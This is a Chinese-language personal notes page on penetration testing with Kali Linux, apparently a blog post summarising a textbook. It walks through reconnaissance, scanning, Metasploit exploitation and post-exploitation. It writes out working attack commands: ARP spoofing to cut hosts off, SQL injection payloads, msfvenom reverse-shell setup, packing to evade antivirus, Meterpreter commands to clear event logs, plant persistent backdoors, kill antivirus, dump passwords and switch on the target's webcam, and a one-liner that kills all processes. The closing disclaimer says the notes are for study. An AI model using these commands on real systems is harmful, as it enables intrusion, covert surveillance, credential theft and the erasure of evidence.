渗透笔记(持续更新)

如何入门渗透

入门的话看这一本就够了,有计算机基础看的更舒服
《Kali Linux渗透测试技术详解》
链接:https://pan.baidu.com/s/1s7YAn6A5q7CQONUMVVZoZQ?pwd=8888
提取码:8888

以下内容就是总结自此书,所以直接看书就行,不用往下翻了

靶场https://www.vulnhub.com/ 注意靶机适配的虚拟机软件
靶场详解 推荐观看红队笔记

也许你在找别的

Web渗透端口笔记扩展工具

序、一些入门了解尝试

linux kali安装(我用Hyper-V安的但是非常后悔,推荐Vmware)

linux bash基础命令

apt命令 本命令具有超级牛力,moo~

有关服务

systemctl * enable/disable/start/stop/restart/status  
启动服务 关闭服务 重启服务 状态查看
service *  同上
chkconfig *  设置开机启动 关闭开机启动  

Proxychains代理设置 通过代理执行命令

vim /etc/proxychains4.conf <加需要代理的ip地址和开放端口>#更改文件以修改代理服务

常用 http(s)8080 socks 1080
命令行中使用 在软件前加 proxychains4 如 proxychains4 git clone ……
测试ip crul cip.cc 测试代理ip proxychains4 crul cip.cc

Tor网络代理 通过多结点隐藏行为

一、信息嗅探

DNS枚举

 dnsenum --enum 网址 -w whois --threads[num]

多进程 -r递归查询 -d请求间隙 -o输出位置 fierce子域查找 -dns 网址

SNMP枚举

snmpwalk    -c public <ip> -v 2c
snmpcheck   -t <ip>

192.168.0.104常用路由器管理员登录地址

域名查询 Dmitry

dmitry -wnpb <ip>

nslookup 反向域名解析

转换域名为子网掩码

netmask -s <ip>

路由跟踪 Scapy
发送、嗅探、剖析和伪造网络数据包

主动收集信息

具有攻击性 留下痕迹

Nmap查询在线,端口,嗅探服务器
查看tcp端口 -sP 查看是否在线 Nping(套具)获取详细信息
查找指定端口范围 -p ?-??? <ip> 输出文件-oG 路径 指纹识别 -A
详细输出 -v
Zenmap GUI化工具 扫描大型网络和主机

APR欺骗

Netdiscover ARP侦查工具 攻击扫描局域网内主机

arpspoof -i eth0 -t <ip> -r <默认网关> #断网指令 条件:网卡正确 处于同一网段    

arp -a ip转mac

Wireshark截取数据包

非主动信息收集

好处是没有痕迹,不易被发现

Maltego 图形化信息收集 被动收集信息 通过网络遍历目录等方式收集 不留痕迹 可结合shodan使用

SHODAN 搜索引擎(服务器):https://www.shodanhq.com

社工库

引擎(一般用):https://searx.org/

二、漏洞扫描

CVE
https://www.exploit-db.com/

主机漏洞扫描

Nessus
优点:功能全面,可视化界面现代化
缺点:功能收费,限制次数
配置完成后127.0.0.1:8834打开网页

OpenVAS
脱离自Nessus,优点就是免费

Web漏洞扫描
nikto wepscan burpsuite yakit

三、漏洞利用

Metasploitable操作系统 用于漏洞测试
metasploit漏洞检测工具 GUI -> Armitage

msfconsle初始化控制台

search 查找漏洞 ms17_010 永恒之蓝0号漏洞 use 0利用此0号漏洞

show options 查看必选项 set RHOSTS <ip>配置目标主机

run运行

msfvenom木马

use exploit/multi/handler #选择模块

-p linux/x64/meterpreter/reverse_tcp #根据系统选择合适的payload

set lhost <ip> #配置监听主机

-x捆绑木马 -o输出文件 -f文件格式

msfcli命令行控制

meterperter 触发漏洞后返回控制通道

Themida加壳,提高免杀能力和隐蔽性

SQL注入 命令执行漏洞

' union select user,password form users # 获取数据库 
1' union select null,database(); #获取数据库名#select要求行数一致 null在补行数
1' union select null,table_name from information_schema.tables where table_schema='数据库名';#获取特定数据库所有表名
1' union select  form '表名' ;#获取表内容 

--dbs列出所有可用数据库-D 加数据库名表示针对 --tables列出数据库表
-T加表名针对 --columns列出表项 --dump读取数据
F12打开控制台,选择网络 刷新页面获取cookie

WPScan 攻击基于WrodPress搭建的网页(blog)

四、进阶渗透

权限提升

提权的方法很多,包括但不限于假冒令牌、爆破密码、提权漏洞、php提权、python提权等等。

攻击载荷(payload)

反弹式shell 目标主机->攻击主机传递shell
Bind shell 在目标系统上绑定shell至监听窗口 攻击者连接打开的端口来取得shell交互

中间人攻击(MITM)

Ettercap 执行命令 ettercap -G 打开图形界面
停止嗅探后 还需停止中间人攻击
Subterfuge自动化中间人攻击工具 127.0.0.1:80访问网页

密码攻击

哈希破解工具网站

在线破解

Hydra
能否破解只与字典是否强大相关 图形工具xHydra
kali自带常用字典: wordlists

自定义创建字典工具Crunch

crunch [min length][max length] [character set (包含元素)][options(比如输出文件-o)]

msfconsole
执行 search email collector 收集组织邮件信息构建字典 mimikatz 破解恢复纯文本密码

Medusa尝试获取远程验证访问权限

离线破解

哈希值识别 hash-identifier
破解哈希值密码 findmyhash <哈希值类型> -h hash
Metaploit psexec绕过哈希值建立会话
John the ripper暴力密码破解器 
rtgen 生成彩虹表(哈希值集合 随密码复杂程度增大 主流100G)
无线网络渗透 Kismet嗅探工具  fluxion wifi钓鱼工具

五、清除痕迹

具体步骤

激活Meterpreter对话

执行命令

msf exploit(handler)> sessions -i 1

执行命令

meterpreter>irb

指定日志

执行命令

log=client.sys.eventlog.open`('文件名')
常有文件名:'system'  'security'  'application'   'directory service'  'dns server' 'file replication service'

清除日志

执行命令

log.clear

六、创建后门

具体步骤

激活Meterpreter对话
如上

run persistence -h #查看后门帮助文件
run persistence -U -A -i 10 - 8090(端口) -r 目标ip #创建后门 

七、后渗透

#以下为meterpreter中命令

刚获得shell时 shell是很脆弱的 实战中需要先进一步操作

 getpid #获取pid

 migrate <num> #将目标转移到某进程

 kill  <num> #杀死某进程 一般是杀死之前残留的进程

 run post/windows/manage/killav #关闭杀毒软件


getuid #查看用户名

run post/windows/gather/checkvm #查看目标是否为虚拟机 

idletime #查看运行时间

route #查看完整网络配置

background #将meterpreter终端隐藏指后台

route add #添加路由 route print查看路由 添加路由后可以用此目标机对其他网络进行攻击 也就是成为了肉鸡

run post/windows/manage/enable_rdp #启动3389远程桌面

run post/windows/manage/autoroute #查看目标机本地子网情况

run post/windows/gather/enum_logged_on_users #列举多少用户登录此主机

run post/windows/gather/enum_applications  #列举应用程序

run windows/gather/credentials/windows_autologin #抓取自动登陆的用户名和密码

#如果抓取失败 可以用Espia插件 load espia加载此插件 screengrab或者screenshot抓取屏幕截图

webcam_list #查看目标机是否有摄像头

webcam_snap #打开摄像头 拍一张照片

webcam_stream #开启直播模式 //直播地址

Shell #进入命令行


pwd getlwd ls cd search download upload #文件系统命令 

提权

whoami  /groups    #查看权限 类似操作还有 <sudo -l>  <getuid> 

getsystem  #提权尝试

systeminfo #查看补丁

假冒令牌

我们先输入use incognito命令,然后输入list_tokens-u列出可用的token
接下来在incognito中调用impersonate_token命令假冒Administrator用户进行攻击 具体命令 impresionate_token <主机名>\用户名
运行成功后在Meterpreter Shell下运行shell命令并输入whoami 可查看到当前已经成为此用户
PwDump是一款Win32环境下的系统授权信息导出工具,目前没有任何一款工具可以导出如此全面的信息、支持这么多的OS版本,而且相当稳定

-dhl:导出本地哈希值。

-dhdc:导出内存中的域控哈希值。

-dhd:导出域控哈希值,必须指定NTDS文件。

-db:导出Bitlocker信息,必须指定NTDS文件。

-nt:导出NTDS文件。

-hist:导出历史信息,可选项。

-t:可选导出类型,默认导出John类型。

-o:导出文件到本地。
WCE windows内网渗透工具 
    
    upload 路径/wce.exe C:\上传wce到靶机C盘 在目标shell下输入wce -w 提取管理员密码 

    -l 读取数据格式 -f 强制安全读取 -g计算密码


Mimikatz  轻量级调试器 用于抓取密码 模拟令牌 获取票据、证书、私钥 绕过远程终端等  已集成在meterpreter中 

     条件:1 已成为管理员 2 windows2000和xp不能用 3 32位 64位也可以 但是会有一些麻烦



持续后门生成:

Cymothoa

Persistence

    #meterpreter提供

Web后门 :

菜刀、蚁剑

meterpreter payload:PHP Meterpreter

杀死当前所有进程

for /f "tokens=1" %i in ('tasklist ^| findstr /I /R ".*"') do taskkill /F /PID %i (win)

pkill -u $USER(linux)
声明:部分摘自网络,仅供学习交流。另,学艺不精,欢迎斧正
此方悬停
相册 小说 Ai
/*音乐播放器插件*/ /*
*/